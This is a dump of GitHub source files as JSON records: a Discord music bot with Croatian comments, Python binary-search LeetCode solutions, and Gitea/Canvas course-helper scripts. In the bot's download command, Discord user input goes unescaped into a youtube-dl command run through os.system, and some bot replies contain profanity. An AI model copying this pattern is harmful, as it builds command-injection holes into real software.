list)\n\[email protected](name='lplay', help='stavlja odabranu listu na kju')\nasync def lplay(ctx, list):\n channel = ctx.message.author.voice.channel\n try: await channel.connect()\n except:\n vc = ctx.voice_client\n print('Already connected.')\n if vc.is_playing():\n await ctx.send('Sviram pesmu ' + sviram)\n\n fajl = open(list + \".txt\", \"r\")\n for x in fajl:\n q.append(x[:len(x)-1])\n\n vc = ctx.voice_client\n muzika(vc)\n\nsvirac.run('TOKEN')\n" }, { "alpha_fraction": 0.7898832559585571, "alphanum_fraction": 0.7937743067741394, "avg_line_length": 72.42857360839844, "blob_id": "55abd4eb56d8e738c4f3bb383be85c1be06d152a", "content_id": "39281b6497be71a2dfa51eb2bf86c56e6d7443f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 520, "license_type": "no_license", "max_line_length": 170, "num_lines": 7, "path": "/README.md", "repo_name": "markov73/Bot-za-discord", "src_encoding": "UTF-8", "text": "# Bot-za-discord \n- jednostavni kod za bot koji pušta muziku \n- na početku se stavi ime servera i na kraju token bota s discordove stranice \n- u funkciji def muzika(vc) mozete prilagoditi put do mp3 datoteka \n- trebate instalirati sve što je importano u kodu + youtube-dl aplikaciju za terminal (ukoliko koristite naredbu 'download') \n- bot3.py je eksperimentalna verzija bota koja pokusava prepoznati greske u upisu i automatski downloadati pjesmu ako pokušavate pustiti nešto što nije u mapi s pesmama \\\nSretno!\n" }, { "alpha_fraction": 0.6234534978866577, "alphanum_fraction": 0.6272189617156982, "avg_line_length": 27.454082489013672, "blob_id": "f8dc0765ed22c74d07bcc9cd10eb0a73c72ef81e", "content_id": "6c365f2d03c49453ef53118fa6d567340e9d4289", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5577, "license_type": "no_license", "max_line_length": 104, "num_lines": 196, "path": "/bot2.py", "repo_name": "markov73/Bot-za-discord", "src_encoding": "UTF-8", "text": "# bot.py\nimport os\nimport time\nimport asyncio\nimport discord\nimport urllib.request\nimport re\nimport random\nfrom tube_dl import Youtube\nfrom discord.ext import commands\nfrom discord.ext.commands import Bot\nfrom collections import deque\nfrom pretty_help import PrettyHelp\n\nserver = 'Drugovi'\n\nsvirac = commands.Bot(command_prefix='b', help_command=PrettyHelp(no_category=\"Help\", show_index=False))\nq = deque()\nsviram = ' '\n\n#queue\ndef muzika(vc):\n global q\n global sviram\n\n if len(q) > 0 and not vc.is_playing():\n try:\n sviram = q.popleft()\n pesma = \"/home/jakov/Documents/muzickibot/muzika/\" + sviram #uredite put do mp3 fajlova\n pesma = pesma + \".mp3\"\n print('Trebal bi svirati ' + pesma)\n vc.play(discord.FFmpegOpusAudio(pesma), after=lambda m: muzika(vc))\n except:\n print('Kju je prazan!')\n return\n return \n\n#spajanje na server\[email protected]\nasync def on_ready():\n for guild in svirac.guilds:\n if guild.name == server:\n break\n print(\n f'{svirac.user} is connected to the following guild:\\n'\n f'{guild.name}(id: {guild.id})'\n )\n\n#muzika s kompa\[email protected](name='sviraj', help='svira muziku s kompjutera')\nasync def sviraj(ctx, *ime):\n channel = ctx.message.author.voice.channel\n try: await channel.connect()\n except:\n print('Already connected.')\n await ctx.send('Sviram pesmu ' + sviram)\n\n# fajl = \"/home/jakov/Documents/muzickibot/muzika/\"\n fajl = ime[0]\n duljina = len(ime)\n for x in range(1,duljina):\n fajl = fajl + ' ' + ime[x]\n# fajl = fajl + \".mp3\"\n\n q.append(fajl)\n print(fajl)\n await ctx.send('Dodana je pesma ' + fajl)\n vc = ctx.voice_client\n try: muzika(vc)\n except: print('Vec nekaj sviram.')\n\n# response = 'Sviram ' + fajl\n\n# vc = ctx.voice_client\n# vc.play(discord.FFmpegPCMAudio(fajl)\n# ctx.send(response)\n\n#muzika s interneta\[email protected](name='download', help='skida muziku s interneta')\nasync def download(ctx, *query):\n trazi = \"https://www.youtube.com/results?search_query=\"\n trazi = trazi + query[0]\n for x in range(1, len(query)):\n trazi = trazi + '+' + query[x]\n print(trazi)\n html = urllib.request.urlopen(trazi)\n video_ids = re.findall(r\"watch\\?v=(\\S{11})\", html.read().decode())\n rezultat = \"https://www.youtube.com/watch?v=\" + video_ids[0]\n\n channel = ctx.message.author.voice.channel\n try: await channel.connect()\n except:\n print('Already connected.')\n await ctx.send('Sviram pesmu ' + sviram)\n\n upis = query[0]\n for i in range(1,len(query)):\n if i == len(query): upis = upis + query[i]\n else: upis = upis + \" \" + query[i]\n naredba = 'youtube-dl -x --audio-format mp3 --output \"' + upis + '.mp3\" ' + rezultat\n os.system(naredba)\n await ctx.send('Skinuto je')\n\n #sviranje\n q.append(upis)\n print(upis)\n await ctx.send('Dodana je pesma ' + upis)\n vc = ctx.voice_client\n try: muzika(vc)\n except: print('Vec nekaj sviram.')\n\n\n#pauziranje\[email protected](name='pauza', help='pauira muziku')\nasync def pauziraj(ctx):\n vc = ctx.voice_client\n try: vc.pause()\n except:\n response = 'Vec je pauzirano. Jebo ti pas mater glupu'\n await ctx.send(response)\n\n#resume\[email protected](name='nastavi', help='nastavlja muziku nakon pauziranja')\nasync def nastavak(ctx):\n vc = ctx.voice_client\n try: vc.resume()\n except:\n response = 'Nikaj je ne pauzirano. Naj me jebati'\n await ctx.send(response)\n\n#skip\[email protected](name='skip', help='preskace trenutni track')\nasync def skip(ctx):\n vc = ctx.voice_client\n try: vc.stop()\n except:\n response = 'Nist ne sviram'\n await ctx.send(response)\n\n#remove from queue\[email protected](name='remove', help='brise pesmu sa kjua (index obavezan)')\nasync def remove(ctx, *imena):\n upis = imena[0]\n for x in range(1,len(imena)):\n upis = upis + ' ' + imena[x]\n try:\n q.remove(upis)\n except:\n response = 'Nema pesme na tom mestu u kjuu'\n await ctx.send(response)\n\n#disconnect\[email protected](name='disconnect', help='diskonektuje sa servera')\nasync def disconnect(ctx):\n try:\n kanal = ctx.voice_client.channel\n await ctx.voice_client.disconnect()\n except:\n await ctx.send('Nisam spojen. Koji ti je kurac?')\n \[email protected](name='lista', help='ispisuje kaj je na listi')\nasync def lista(ctx):\n response = ''\n for x in range(0,len(q)):\n response = response + str(x+1) + \" \" + q[x] + '\\n'\n embed = discord.Embed(title=\"Kju pesama\", description=response, color=discord.Color.red())\n await ctx.send(embed=embed)\n\[email protected](name='miks', help='shuffle')\nasync def miks(ctx):\n global q\n random.shuffle(q)\n\[email protected](name='clear', help='klira kju')\nasync def klir(ctx):\n global q\n q.clear()\n vc = ctx.voice_client\n try: vc.stop()\n except:\n response = 'Nist ne sviram'\n await ctx.send(response)\n \[email protected](name='popis', help='ispisuje popis mogucih pesama')\nasync def popis(ctx, slovo):\n os.system('ls > popis.txt')\n file = open(\"/home/jakov/Documents/muzickibot/muzika/popis.txt\", \"r\")\n ispis = ''\n for x in file:\n if x[0] == slovo.lower() or x[0] == slovo.upper():\n ispis = ispis + x + '\\n'\n\n embed = discord.Embed(title=\"Popis pesama\", description=ispis, color=discord.Color.blue())\n await ctx.send(embed=embed)\n\nsvirac.run('BOT_TOKEN') #dodaj svoj token\n" } ]
3
runhugo/Leetcode
https://github.com/runhugo/Leetcode
ad965867427e896616b7cc324533b6135a1b6cd9
104cd872d61ca0f94bed9e38f8fa75f3bb213d22
95d4f4475903fd58abb0f2e58c791078dccf1ecb
refs/heads/main
2023-02-20T04:03:17.158189
2021-01-22T10:51:33
2021-01-22T10:51:33
327,858,407
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7906976938247681, "alphanum_fraction": 0.7906976938247681, "avg_line_length": 20.5, "blob_id": "e21d22f95b0ca8766a8649aecbd2dbfcd728108b", "content_id": "6ff4a99faec6216c0dc2df8f1fab114f67b5f250", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 43, "license_type": "no_license", "max_line_length": 31, "num_lines": 2, "path": "/README.md", "repo_name": "runhugo/Leetcode", "src_encoding": "UTF-8", "text": "# Leetcode\nTo recode the study on Leetcode\n" }, { "alpha_fraction": 0.6004343032836914, "alphanum_fraction": 0.628664493560791, "avg_line_length": 23.263158798217773, "blob_id": "f5f4bbacd4cbd4c857523c2f2a361a74d170a0a8", "content_id": "3ca7d837e3feb231e0692661b3cd24613809ae3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1415, "license_type": "no_license", "max_line_length": 84, "num_lines": 38, "path": "/binary search/35_seachInsert.py", "repo_name": "runhugo/Leetcode", "src_encoding": "UTF-8", "text": "# 给定一个排序数组和一个目标值,在数组中找到目标值,并返回其索引。\n# 如果目标值不存在于数组中,返回它将会被按顺序插入的位置。\n# 你可以假设数组中无重复元素。\n\n# Example: \n# input: [1,3,5,6], 5; output: 2\n# input: [1,3,5,6], 2; output: 1\n\n# 基本思路:(排序数组寻找目标值,用二分查找)\n#\n# 当num[mid] == target时,直接返回mid\n# 当num[mid] < target, 证明target在右半边\n# 当num[mid] > target,证明在左半边\n# 如果最后没有找到,left最终指向的位置则是插入的位置,因为:\n# 最后找不到时必定会有left==right==mid的情况,此时(在元素不重复时),target只会插在这个元素的左边或右边\n# (1)若num[mid] < target,则target应该插在右边,根据上述条件,left=mid+1\n# (2)若num[mid] > target,则target应该插在这个元素左边,此时right=mid-1,left不变(相当于元素插入到当前位置,现在的值往后移)\ndef searchInsert(nums, target):\n left = 0\n right = len(nums) - 1\n\n while left <= right:\n mid = left + (right - left) // 2\n guess = nums[mid]\n\n if guess == target:\n return mid\n\n if guess < target:\n left = mid + 1\n else:\n right = mid - 1\n return left\n\nnums = [1,5,6,9]\ntarget = 8\n\nprint(str(searchInsert(nums, target)))" }, { "alpha_fraction": 0.46912649273872375, "alphanum_fraction": 0.5075300931930542, "avg_line_length": 20.063491821289062, "blob_id": "847696351124d4a4ae0a892194d9e08017d2b38d", "content_id": "366cdeed32b3c92189d5a16d19f567a5cb12cc6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1895, "license_type": "no_license", "max_line_length": 70, "num_lines": 63, "path": "/binary search/68_mySqrt.py", "repo_name": "runhugo/Leetcode", "src_encoding": "UTF-8", "text": "# 实现 int sqrt(int x) 函数。\n# 计算并返回 x 的平方根,其中 x 是非负整数。\n# 由于返回类型是整数,结果只保留整数的部分,小数部分将被舍去。\n\n# 基本思路:\n# \b因为平方根之后的数一定在[0,x]之间(nums=[0,x]),通过二分\n# 查看mid点的数的平方是否等于x\n#(1)num[mid]*num[mid] = x,则返回num[mid]\n#(2)num[mid]*num[mid] < x,则得数在[num[mid+1],x]之间\n#(3)num[mid]*num[mid] > x,则得数在[0,num[mid-1]]之间\n# 最后结束时,right所指即x开方后的取整值\ndef mySqrt(x:int):\n if(x < 0):\n return -1\n \n left = 0\n right = x\n\n while left <= right:\n mid = left + (right - left) // 2\n sq = mid * mid\n\n if sq == x:\n return mid\n\n if sq < x:\n left = mid + 1\n else:\n right = mid - 1\n return right\n\n# 还可以用牛顿法\n# 牛顿法的介绍:https://www.matongxue.com/madocs/205/\n# \n# 基本思路:求x的平方根,其实就是求函数f(x)=x^2-a等于0时的正解\n# 通过牛顿法,可算得迭代式:x(n+1) = (x(n)^2 + a) / (2*x(n))\n# 迭代停止条件:\n# 我的思路(可行吗?代码上可行):每次算得x(n+1),带回f(x)中,当收敛于0时,则可以视为是x的平方根 (我的思路。。这个可行吗?)\n# 网站思路:当两次的迭代点足够近时,则认为收敛,找到解\ndef mySqrt_newton(x):\n if x < 0:\n return -1\n \n if x == 0:\n return 0\n \n x1 = x\n while True:\n x0 = x1\n x1 = 0.5 * (pow(x1, 2) + x) / x1\n # 我的思路可实现\n # x_hat = pow(x1, 2) - x\n # if abs(x_hat) < 1e-7:\n # return x1\n \n # 网站思路\n if abs(x1 - x0) < 1e-7:\n return x1 \n\n\nprint(str(mySqrt(8)))\nprint(str((mySqrt_newton(8))))\nprint(3%6)\n\n" }, { "alpha_fraction": 0.4554579555988312, "alphanum_fraction": 0.49121707677841187, "avg_line_length": 26.973684310913086, "blob_id": "2134622a6ae870297a895f6ed7d225e399034a1b", "content_id": "143d75ad7dee7c8143a0432217998e55b0cb4902", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3766, "license_type": "no_license", "max_line_length": 146, "num_lines": 114, "path": "/binary search/jzoffer_53.py", "repo_name": "runhugo/Leetcode", "src_encoding": "UTF-8", "text": "# 剑指offfer 53\n# 统计一个数字在排序数组中出现的次数\n# 输入:数组=[5, 7, 7, 8, 8, 10], target=8(target = 6)\n# ouput: 2(0)\n\nimport time\n\n# 我的思路:\n# 先找到任意一个目标数字的位置,计算一次次数\n# 然后对该位置的上、下方向分别逐个查找,找到一个次数+1,数字与目标不匹配则结束\ndef search(nums, target):\n\n start = time.time()\n count = 0\n\n low = 0\n high = len(nums) - 1\n\n while low <= high:\n mid = int((low + high) / 2)\n guess = nums[mid]\n\n if guess < target:\n low = mid + 1\n elif guess > target:\n high = mid - 1\n else:\n count = count + 1\n\n low_limit = mid\n while low_limit > 0:\n low_limit = low_limit - 1\n low_target = nums[low_limit]\n if low_target == target:\n count = count + 1\n else:\n break\n \n high_limit = mid\n while high_limit < len(nums) - 1:\n high_limit = high_limit + 1\n high_target = nums[high_limit]\n if high_target == target:\n count = count + 1\n else:\n break\n break\n stop = time.time()\n print(\"My Answer-Running time: \" + str(stop - start))\n return count\n\n# 精选答案:https://leetcode-cn.com/problems/zai-pai-xu-shu-zu-zhong-cha-zhao-shu-zi-lcof/solution/mian-shi-ti-53-i-zai-pai-xu-shu-zu-zhong-cha-zha-5/\ndef search_suggested(nums, target):\n # 以后为基本思路的优化代码\n # 帮助找到边界点\n def helper(tar):\n left, right = 0, len(nums) - 1\n while left <= right:\n mid = int((left + right) / 2)\n guess = nums[mid]\n\n if guess <= tar:\n left = mid + 1\n else:\n right = mid - 1\n return left\n\n start = time.time()\n\n # target的左边界(包含target)可以理解为找target - 1的右边界\n # 此时则可以抽象为同一个函数\n # 最后的计数则直接为right - left即可\n count = helper(target) - helper(target - 1)\n stop = time.time()\n print(\"Suggested-Running time:\" + str(stop - start))\n return count\n\n # 基本思路:\n # left = 0\n # right = len(nums) - 1\n # # 先寻找右边界(不包含target的)\n # while left <= right:\n # mid = int((left + right) / 2)\n # edge = nums[mid]\n # # 为了寻找右边界,当edge=target的时候,也要对使左边界+1\n # # 当循环条件结束达成后,右边界即为最后的left = mid+1(此时left>right)\n # if edge <= target:\n # left = mid + 1\n # else:\n # right = mid - 1\n # right_edge = left\n # # 寻找到右边界后,左边界则在[0,right]之间\n # # 在此之前,先判断有没有必要寻找左边界\n # # 先通过判断nums[right]是否等于target来判断最终的数组是否包含target\n # # 如果不等于,即不包含,则直接返回0,没有必要寻找左边界\n # if right >= 0 and nums[right] != target:\n # return 0\n # left = 0\n # while left <= right:\n # mid = int((left + right) / 2)\n # edge = nums[mid]\n # if edge < target:\n # left = mid + 1\n # else:\n # right = mid - 1\n # left_edge = right\n # count = right_edge - left_edge + 1\n \n\nnums = [5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, \n8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 10]\ntarget = 7\nprint(str(search(nums, target)))\nprint(str(search_suggested(nums, target)))" }, { "alpha_fraction": 0.6124513745307922, "alphanum_fraction": 0.6505836844444275, "avg_line_length": 31.149999618530273, "blob_id": "4dba6fb63005aac842692a4cb3d56b21b88a9e04", "content_id": "61be33afb6238937a38c830a1c26d94e2c65137f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2275, "license_type": "no_license", "max_line_length": 86, "num_lines": 40, "path": "/binary search/jzoffer_53_ii.py", "repo_name": "runhugo/Leetcode", "src_encoding": "UTF-8", "text": "# 剑指offer 35 ii\n# 一个长度为n-1的递增排序数组中的所有数字都是唯一的,并且每个数字都在范围0~n-1之内。在范围0~n-1内的n个数字中有且只有一个数字不在该数组中,请找出这个数字。\n# input: [0,1,3], output: 2\n# input: [0,1,2,3,4,5,6,7,9], output: 8\n\n\n# 我的思路:通过二分,查看mid对应的元素,然后通过+1/-1来与mid下一个/上一个元素进行比较,\n# 如果相等,表示这几个数字连续,则不连续数字是在[left, mid-1]和[mid+1, right]之间\n# 以此类推,通过不断划分区间,并对这些区间进行二分查询,找到缺失数字\n## 但是该方法不可行,1是没有想明白跳出循环点的条件,2是问题复杂化,需要左右两边要分别查询。此外如果数组很大,而缺失数字由在极端位置,使得复杂度增加\n\n\n# 推荐思路:因为是递增有序数组,且数字都是唯一,则如果没有期间数字缺失的话,数组索引与索引对应的值应该是相等的(因为值也是从0开始)-->即num[i]=i\n# 则可以把数组分为左右两个部分(以缺失数字为分界),即寻找左数组的末尾索引和右数组的首位索引。\n# 而缺失数字则对应右数组的首位索引(即第一个num[i]!=i)。所以\n# 循环:left<=right(left = 0, right = len - 1)\n# 寻找中点:mid = left + right // 2 --> int((left + right) / 2)\n# if num[mid] == mid,则右数组的首位一定在[mid + 1, right]之中\n# if num[mid] != mid,则左数组的末位一定在[left, mid - 1]之中(即右数组首位在[left, mid]之间--可能mid刚好就是右数组首位)\ndef missingNumber(nums):\n\n left = 0\n right = len(nums) - 1\n\n while left <= right:\n # mid = (left + right) // 2\n # 当left和right都是极端大的数时,直接相加可能会导致溢出(python可能不存在这样的问题,但是java和c都有可能会)\n # 所有先做减法(right - left)可以有效避免变量溢出\n mid = left + (right - left) // 2 \n guess = nums[mid]\n\n if guess == mid:\n left = mid + 1\n else:\n right = mid - 1\n \n return left\n\nnums = [0,1,3,4,5,6,7,8,9]\nprint(missingNumber(nums))" } ]
5
makersmelx/GiteaCanvasHelper
https://github.com/makersmelx/GiteaCanvasHelper
336a4aa15c3d843f349402facf28499e4bf79c88
78f9f16193ddd9387643a97bd19b098c7515c5c9
48c7bffbb08d7409e7f2594155b2c4fbda30c169
refs/heads/master
2023-08-18T09:39:57.706151
2021-09-14T15:34:17
2021-09-14T15:34:17
294,352,665
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.5870445370674133, "alphanum_fraction": 0.6194332242012024, "avg_line_length": 23.700000762939453, "blob_id": "ee953a1817aa79956ccb2a0515e89b875c48655b", "content_id": "e85406ae2f5b22df15c4eae43c8170e564ff5b76", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 247, "license_type": "permissive", "max_line_length": 56, "num_lines": 10, "path": "/loop.sh", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "if [ $1 ];then\n while((1));do\n npm start s $1 student\n python3 CreatePersonalRepo/CreatePersonalRepo $1\n echo \"Ai. Done. Sleep. Good night\"\n sleep 300\n done\nelse\n echo \"Missing one argument for course name\"\nfi\n" }, { "alpha_fraction": 0.6054104566574097, "alphanum_fraction": 0.6091417670249939, "avg_line_length": 25.14634132385254, "blob_id": "0a8010da3b25d8d241577c06fde3ebff96b89a8f", "content_id": "30174708ce73d2e0b457d4113c7a759e323a8e95", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1072, "license_type": "permissive", "max_line_length": 74, "num_lines": 41, "path": "/src/teams/addUserToTeam.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "import { giteaInstance } from '../axios';\nimport { logger } from '../logger';\n\nexport const addUserToTeam = async (username, organization, teamName) => {\n const response = (await giteaInstance.get(\n `/orgs/${organization}/teams/search`, {\n params: {\n q: teamName,\n },\n }));\n const queryList = response.data.data;\n if (queryList.length === 0) {\n logger.error(`Team ${teamName} does not exist.`);\n return;\n }\n const id = queryList[0].id;\n await giteaInstance.put(`/teams/${id.toString()}/members/${username}`)\n .then((response) => {\n }, (error) => {\n logger.error(error);\n },\n );\n};\n\nexport const addUserToTeamBySJTUID = async (\n student, organization, teamName) => {\n const userList = (await (giteaInstance.get(`/users/search`, {\n params: {\n q: student.login_id,\n },\n }))).data.data;\n if (userList.length === 0) {\n return ({\n name: student.name,\n id: student.login_id,\n });\n }\n const username = userList[0].username;\n await addUserToTeam(username, organization, teamName);\n return null;\n};\n" }, { "alpha_fraction": 0.7333333492279053, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 29.25, "blob_id": "4dc7c4fb3dfeb0a3a150c4dfb32eb79877345969", "content_id": "5ca6cfb2cfe1d61c6bd2ffd235850d9f53eee713", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 120, "license_type": "permissive", "max_line_length": 48, "num_lines": 4, "path": "/src/courses/courses.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "const fs = require('fs');\n\nconst rawData = fs.readFileSync('courses.json');\nexport const courseID = JSON.parse(rawData);" }, { "alpha_fraction": 0.6364567279815674, "alphanum_fraction": 0.6395289301872253, "avg_line_length": 29.984127044677734, "blob_id": "a0958c22c0a8c314c6f780170aeef099938961f5", "content_id": "e49bd370170ae5b6d445d57b538681b16a829ce9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1953, "license_type": "permissive", "max_line_length": 163, "num_lines": 63, "path": "/src/courses/initTeams.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "import { addUserToTeamBySJTUID, createTeam, formatTeamName } from '../teams';\nimport { canvasInstance } from '../axios';\nimport { courseID } from './courses';\nimport { logger } from '../logger';\nimport { createTeamRepo } from '../teams/createTeamRepo';\n\n/**\n *\n * @param organization\n * @param groupSet\n * @returns {String[]} a list of student that has not been added to team\n */\nexport const initTeams = async (courseName, organization, groupSet) => {\n const failList = [];\n let courseGroupList = [];\n let pageCount = 1;\n while (1) {\n let onePageGroupList = (await canvasInstance.get(\n `/courses/${courseID[courseName]}/groups`, {\n params: {\n page: pageCount,\n },\n })).data;\n if (onePageGroupList.length === 0) {\n break;\n }\n courseGroupList = [...courseGroupList, ...onePageGroupList];\n pageCount = pageCount + 1;\n }\n\n const groupList = courseGroupList.filter(\n group => {\n let splitName = group.name.split(' ');\n return splitName[0] === groupSet;\n });\n for (const group of groupList) {\n // get a formatted team name from canvas group\n const groupNum = parseInt(group.name.substr(-2));\n if (isNaN(groupNum)) {\n logger.error(\n `Invalid format for group name ${group.name}. I suppose that the last two should be numbers. I will skip this team. Please init it on Gitea by yourself.`);\n continue;\n }\n\n // create team\n const teamName = formatTeamName(groupSet, groupNum);\n await createTeam(organization, teamName, {});\n await createTeamRepo(organization, teamName);\n\n // add team member\n const groupID = group.id;\n const memberList = (await canvasInstance.get(\n `/groups/${groupID}/users`)).data;\n for (const student of memberList) {\n const failInfo = await addUserToTeamBySJTUID(student, organization,\n teamName);\n if (failInfo) {\n failList.push(failInfo);\n }\n }\n }\n return failList;\n};\n\n" }, { "alpha_fraction": 0.6369426846504211, "alphanum_fraction": 0.6382165551185608, "avg_line_length": 31.70833396911621, "blob_id": "f0089eb92d9863cfbb8666b5b2f8d8035eb2e27b", "content_id": "24dafa1241b9a44c5a778e55429a2c219dc294d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 785, "license_type": "permissive", "max_line_length": 47, "num_lines": 24, "path": "/src/settings/branchProtection.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "export const teamRepoMasterProtection = () => {\n return {\n 'branch_name': 'master',\n 'enable_push': true,\n 'enable_push_whitelist': true,\n 'push_whitelist_usernames': [],\n 'push_whitelist_teams': ['owners'],\n 'push_whitelist_deploy_keys': false,\n 'enable_merge_whitelist': false,\n 'merge_whitelist_usernames': [],\n 'merge_whitelist_teams': [],\n 'enable_status_check': false,\n 'status_check_contexts': null,\n 'required_approvals': 1,\n 'enable_approvals_whitelist': false,\n 'approvals_whitelist_username': [],\n 'approvals_whitelist_teams': [],\n 'block_on_rejected_reviews': false,\n 'block_on_outdated_branch': false,\n 'dismiss_stale_approvals': false,\n 'require_signed_commits': false,\n 'protected_file_patterns': '',\n };\n};\n" }, { "alpha_fraction": 0.7217391133308411, "alphanum_fraction": 0.760869562625885, "avg_line_length": 31.85714340209961, "blob_id": "fa69090bc3a8141509b36cfaf95548b638a691d2", "content_id": "754384ddaf12537f165b4b52388bb57705fc77ab", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 230, "license_type": "permissive", "max_line_length": 54, "num_lines": 7, "path": "/example/.env.example", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "GITEA_BASE_URL=https://focs.ji.sjtu.edu.cn/git/api/v1/\nGITEA_TOKEN=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\nCANVAS_BASE_URL=https://umjicanvas.com/api/v1/\nCANVAS_TOKEN=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\nCONNECTION=local11\nLOCAL_GITEA_URL=http://localhost:3000/api/v1/\nLOCAL_GITEA_TOKEN=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n" }, { "alpha_fraction": 0.527308464050293, "alphanum_fraction": 0.532023549079895, "avg_line_length": 32.93333435058594, "blob_id": "b08103e868c643f4319860ca98805c8f5b503628", "content_id": "07dc779e9aa2e6b421b3cf32a0a775b0880416a1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2545, "license_type": "permissive", "max_line_length": 103, "num_lines": 75, "path": "/CreatePersonalRepo/CreatePersonalRepo.py", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "import requests\nimport json\nimport os\nimport re\nimport sys\n\ndotenv_path = '.env'\n\n\ndef import_env():\n with open(dotenv_path) as dotenv:\n for line in dotenv:\n var = line.strip().split('=')\n if len(var) == 2:\n key, value = var[0].strip(), var[1].strip()\n os.environ[key] = value\n\n\ncourse_name = sys.argv[1]\norganization_name = sys.argv[2]\ncourse_id_json_path = 'courses.json'\n\nif __name__ == \"__main__\":\n import_env()\n\n canvas_base_url = os.environ['CANVAS_BASE_URL']\n gitea_base_url = os.environ['GITEA_BASE_URL']\n canvas_token = os.environ['CANVAS_TOKEN']\n gitea_token = os.environ['GITEA_TOKEN']\n with open(course_id_json_path) as json_file:\n course_id_dict = json.load(json_file)\n course_id = course_id_dict[course_name]\n\n url = canvas_base_url + '/courses/{}/students'.format(course_id)\n r = requests.get(url,\n params={'access_token': canvas_token})\n\n student_list = json.loads(r.text)\n\n for student in student_list:\n student_sjtu_id = student['login_id']\n student_name = student['name']\n\n url = gitea_base_url + '/users/search'\n r = requests.get(url, params={\n 'access_token': gitea_token,\n 'q': student_sjtu_id,\n })\n\n user_list = json.loads(r.text)['data']\n if len(user_list) == 0:\n print('{} has not registered yet'.format(student_name))\n continue\n\n username = user_list[0]['username']\n\n repo_name = re.sub(r'[(\\u4e00-\\u9fa5), ]', '', student_name) + str(student_sjtu_id)\n\n # Create personal repo\n r = requests.post(url, {\n \"auto_init\": True,\n \"description\": \"Personal repo for {} in {}\".format(student_name, organization_name),\n \"name\": repo_name,\n \"private\": True,\n }, params={'access_token': gitea_token})\n\n url = gitea_base_url + \\\n '/repos/{}/{}/collaborators/{}'.format(organization_name, repo_name, username)\n r = requests.put(url, {'permission': 'write'}, params={\n 'access_token': gitea_token})\n\n # delete here\n # url = gitea_base_url + '/orgs/{}/repos'.format(organization_name)\n # r = requests.delete(gitea_base_url + '/repos/{}/{}'.format(organization_name, repo_name),\n # params={'access_token': gitea_token})\n" }, { "alpha_fraction": 0.6178243160247803, "alphanum_fraction": 0.6219473481178284, "avg_line_length": 35.66279220581055, "blob_id": "3aff9a37de606e3f154ab2344b8f232b7ec13916", "content_id": "3ee7cfe946c613224641af1e316bf1f14035aad1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3153, "license_type": "permissive", "max_line_length": 106, "num_lines": 86, "path": "/GradeFromJOJ/GradeFromJOJ.py", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "\"\"\"\nCanvas fast grading script\nby makersmelx <[email protected]>\n\"\"\"\n\nimport utils\nimport os\nimport csv\nfrom datetime import timedelta\nfrom canvasapi import Canvas\nimport sys\nimport settings\n\ncanvas_full_score = sys.argv[4]\njoj_full_score = sys.argv[5]\ncli_weight = float(canvas_full_score)/float(joj_full_score)\n\n\ndef joj_score_to_canvas_score(_student):\n print('==============================')\n print(\"{}\\t{}\".format(\n _student[settings.csv_name_column], _student[settings.csv_sjtu_id_column]))\n _score = 0\n if len(settings.csv_score_column) != len(settings.weight):\n print(\"Make sure that you can add a weight to all the columns you would like to include\")\n exit(1)\n if len(sys.argv) == 6:\n # if set canvas and joj full score in cli args, then simply use the full score on JOJ to calculate\n settings.weight = [cli_weight]\n for i in range(len(settings.csv_score_column)):\n _column_grade = _student[settings.csv_score_column[i]]\n # todo: complete non number detection\n if _column_grade == '-':\n _column_grade = 0\n _score += float(_column_grade) * settings.weight[i]\n\n # adjustment\n if _student[settings.csv_sjtu_id_column] in settings.extra_adjust:\n _adjust = settings.extra_adjust[_student[settings.csv_sjtu_id_column]]\n _score += _adjust\n print(\"Extra adjust: {}\".format(_adjust))\n\n print('Now score: {}'.format(_score))\n\n if _student[settings.csv_sjtu_id_column] in settings.direct_reassign:\n _reassign = settings.direct_reassign[_student[settings.csv_sjtu_id_column]]\n _score = _reassign\n print('Score is directly 